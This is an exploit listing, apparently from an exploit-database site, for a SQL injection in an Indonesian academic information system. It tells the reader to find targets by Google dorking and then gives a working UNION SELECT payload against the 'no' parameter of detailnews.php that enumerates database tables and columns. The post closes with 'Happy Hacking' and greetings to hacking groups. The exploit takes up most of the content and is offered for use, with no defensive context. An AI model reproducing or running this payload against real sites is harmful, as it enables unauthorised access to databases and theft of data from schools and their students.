Sistem Informasi Akademik SQL Injection

2020.01.22
id s3nt1n3L (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

1. Dorking on google 2. Exploit : https://site.id/detailnews.php?no=-1'+UNION+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7--+- Happy Hacking :'> Thx : D704T - Ghost Hunter Illusion - Cianjur666etar - ./palc_0n


Vote for this issue:
20%
80%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top